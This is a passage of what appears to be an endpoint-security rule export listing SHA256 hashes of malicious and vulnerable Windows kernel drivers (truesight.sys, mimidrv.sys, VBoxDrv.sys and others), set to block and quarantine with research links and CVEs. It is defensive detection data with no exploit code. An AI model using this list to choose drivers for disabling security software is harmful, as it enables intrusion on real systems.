"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976921Z", + "creation_date": "2026-03-23T11:45:29.976923Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976928Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b309ab94ce74e0611372374408cd9c83efcfbd58d1b3df2567fcb78ab245b1d3", + "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) 
[https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9b0a929f-45c8-5f8d-8424-ccd9e124eb08", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822171Z", + "creation_date": "2026-03-23T11:45:30.822174Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822179Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "665512fdf31d81504e6540e94d8f1b39f3e56932054a9b83aa4a45360e1c5477", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9b0c0519-a67f-57ff-995e-07f8771d9e24", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.484751Z", + "creation_date": 
"2026-03-23T11:45:31.484755Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.484764Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "13e38c1312d7ac8fac4e6f80c3756f8348e0c566773e290cea6dc176601d9e4d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9b0efb40-097f-5aef-9668-4ca4fd0288ef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824708Z", + "creation_date": "2026-03-23T11:45:31.824710Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824716Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b31a9a31a00498fb7c81761183e390e3c78180e5bcfb2573fdf95d6a628ebf5a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "9b19490b-3179-54e5-b400-83c063e6dd99", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466326Z", + "creation_date": "2026-03-23T11:45:30.466330Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466337Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ac5fb90e88d8870cd5569e661bea98cf6b001d83ab7c65a5196ea3743146939a", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9b293db4-99c4-5363-8924-42168070f5fb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604889Z", + "creation_date": "2026-03-23T11:45:29.604891Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604897Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6029e838d1573bc036d8f7848e5e4671360617cd138c0e8d5f159a848e5d2782", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9b2d0f94-fb1d-5643-8661-a33fcd367338", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972772Z", + "creation_date": "2026-03-23T11:45:29.972774Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972779Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "605e0efa14fc8443dc43c2068f17e6f175369909d5f7f1c3730fb5fe062528e6", + "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9b33552b-b583-588d-971c-0a6092e3c879", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813844Z", + "creation_date": "2026-03-23T11:45:31.813847Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813852Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e9acd4ef31444f62847ca2d6197f807a88f2539d5cef2c6a14a6fa0b5361b5c1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9b379b83-bca4-5e5c-a02e-f9a8fdbab5d6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974609Z", + "creation_date": "2026-03-23T11:45:29.974611Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974617Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"83a67b544982a2fd1484af752cc4ab2f6c0b50cb3c9dba60b888c2c2e37d1036", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9b39597e-e119-5e8b-a4bc-9637fc092ee5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141558Z", + "creation_date": "2026-03-23T11:45:31.141560Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141566Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d7f685c13c33b23791328fb4169067755632cb0ee423a3ea465514f8f7311607", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9b3a48b4-67cb-534b-b762-d0d0d39c828e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819651Z", + "creation_date": "2026-03-23T11:45:31.819654Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819662Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "11b37c27e8598456fa635850d96de920d93062bad509278c074e7502dc3c9b6e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9b3ee847-0a69-5ccf-ab0a-5d5b50e48a2e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814338Z", + "creation_date": "2026-03-23T11:45:31.814341Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814349Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a23601872001105d92f91118d89c66a3a74c723dae381b821a06357f705ad0fc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9b42451e-5d0b-5235-bfad-a3db392e14d8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479386Z", + "creation_date": "2026-03-23T11:45:30.479388Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479393Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7164aaff86b3b7c588fc7ae7839cc09c5c8c6ae29d1aff5325adaf5bedd7c9f5", + "comment": "Vulnerable Kernel Driver (aka segwindrvx64.sys) [https://www.loldrivers.io/drivers/a4aa80bc-4ecd-49ab-bc0f-0f49b07fdd7f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9b45e5e4-9065-56e6-945b-3093a25deaba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498603Z", + "creation_date": "2026-03-23T11:45:31.498607Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498616Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "57390caccbbacd3bc02c80508b3564166e1f8a63c2449ea54334c5ae08ca2615", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9b48cf4d-0072-51dd-9b1e-0348c584b62c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608652Z", + "creation_date": "2026-03-23T11:45:29.608654Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608660Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3069a07f31cb4a3fd99055cfe33b8efba08859b7d3e225060edc6631b6f44020", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9b4914a9-4e9f-5764-903f-f225c30c625b", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823106Z", + "creation_date": "2026-03-23T11:45:31.823108Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823114Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e9b011f78de85f1fc8668715f2e6d45ac54490de6bfcef4606f5a9b5d4c016e2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9b4bca38-85be-52f9-99cb-b705c3f4bb22", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622544Z", + "creation_date": "2026-03-23T11:45:29.622546Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.622551Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4324f3d1e4007f6499a3d0f0102cd92ed9f554332bc0b633305cd7b957ff16c8", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9b55c916-ff55-5a94-95ca-f61f48eba0b0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474088Z", + "creation_date": "2026-03-23T11:45:31.474092Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474103Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2d0e06009cc878d926dce6cabea21892a8cccfc1d9aebb64ff63b6db24711719", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9b66ff0a-82a4-5db7-8c11-c9c825119b73", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836378Z", + "creation_date": "2026-03-23T11:45:30.836380Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836386Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "235195db6d1ecc4c264e231ac07f282d2ce899243ab8509db9d58232a7379b3a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9b694244-2a08-5c41-b72f-f3b6a781f45b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154786Z", + "creation_date": "2026-03-23T11:45:31.154788Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154794Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "e492c59970771138c78b4f8b069c4adec06ccccb0d4275b1d585c80a4e968a61", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9b876d8e-9919-5d13-a6d5-95a82d65e4b6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614041Z", + "creation_date": "2026-03-23T11:45:29.614043Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614048Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b78cb190a4968d06f2cdab65ea0106bc47eefdaffc871ba5dd2c2dccadb1e403", + "comment": "Huawei vulnerable drivers (aka HwOs2Ec10x64.sys and HwOs2Ec7x64.sys) [CVE-2019-5241] [https://www.microsoft.com/security/blog/2019/03/25/from-alert-to-driver-vulnerability-microsoft-defender-atp-investigation-unearths-privilege-escalation-flaw/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9b8bf0ad-2273-5c2a-98e2-34d5d33a6c81", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832677Z", + "creation_date": "2026-03-23T11:45:30.832679Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832684Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b13314c6f8542d00987278da7bcc3a5833882533c249eee4a4ffed6b01f7e076", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9b9ca365-99c1-5227-8d1f-5063fc11ecac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465255Z", + "creation_date": "2026-03-23T11:45:30.465258Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465267Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"a7a665a695ec3c0f862a0d762ad55aff6ce6014359647e7c7f7e3c4dc3be81b7", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9b9e600a-5acc-541e-b6f7-01e531fda2ef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819995Z", + "creation_date": "2026-03-23T11:45:30.819997Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820002Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c0a60e07b06033497ded62ed49fbf3eb3d8fe750eebc3f0c332f5d84ab17e045", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9bb0dbd1-7927-5648-9369-9a348f0396d6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
